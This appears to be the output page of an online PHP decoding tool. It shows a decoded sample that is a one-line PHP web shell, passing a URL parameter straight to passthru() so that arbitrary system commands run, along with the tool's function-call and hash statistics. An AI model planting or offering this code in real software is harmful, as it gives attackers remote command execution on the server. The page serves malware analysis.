Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo passthru($_GET['a']); ?>..

Decoded Output download

<?php 
echo passthru($_GET['a']); 
?>

Did this file decode correctly?

Original Code

<?php
echo passthru($_GET['a']);
?>

Function Calls

passthru 1

Variables

None

Stats

MD5 9d8491f5d5a9db7cc61b418e2bd656de
Eval Count 0
Decode Time 44 ms